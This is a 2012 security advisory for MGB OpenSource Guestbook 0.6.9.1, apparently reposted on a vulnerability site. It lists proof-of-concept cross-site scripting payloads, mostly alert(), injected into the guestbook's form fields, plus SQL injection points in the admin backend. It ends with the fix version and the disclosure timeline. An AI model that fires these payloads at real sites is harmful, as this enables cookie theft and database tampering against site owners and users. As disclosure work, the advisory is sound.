MGB OpenSource Guestbook 0.6.9.1 Cross Site Scripting and SQL Injection

2012.07.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

Advisory: MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities Advisory ID: SSCHADV2012-017 Author: Stefan Schurtz Affected Software: Successfully tested on MGB OpenSource Guestbook 0.6.9.1 Vendor URL: http://www.m-gb.org Vendor Status: fixed ========================== Vulnerability Description ========================== The MGB OpenSource Guestbook is prone to multiple security vulnerabilities ================== PoC-Exploit ================== // XSS # GET http://[target]/mgb/index.php?p=1'"</script><script>alert(document.cookie)</script> # POST http://[target]/mgb/newentry.php sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq='"</style></script><script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq=&aim='"</style></script><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=='"</style></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"</style></script><script>alert(/xss/)</script>&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1& sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq='"</style></script><script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq=&aim='"</style></script><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=='"</style></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"</style></script><script>alert(/xss/)</script>&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 // SQLi (Admin backend) http://[target]/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1 http://[target]/mgb/admin/admin.php?action=deactivate&id=[SQLi]&p=1 ========= Solution ========= Upgrade to the latest version 0.6.9.2 ==================== Disclosure Timeline ==================== 05-Jul-2012 - developer informed 07-Jul-2012 - feedback from developer 15-Jul-2012 - fixed by developer ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt

References:

http://www.m-gb.org
http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top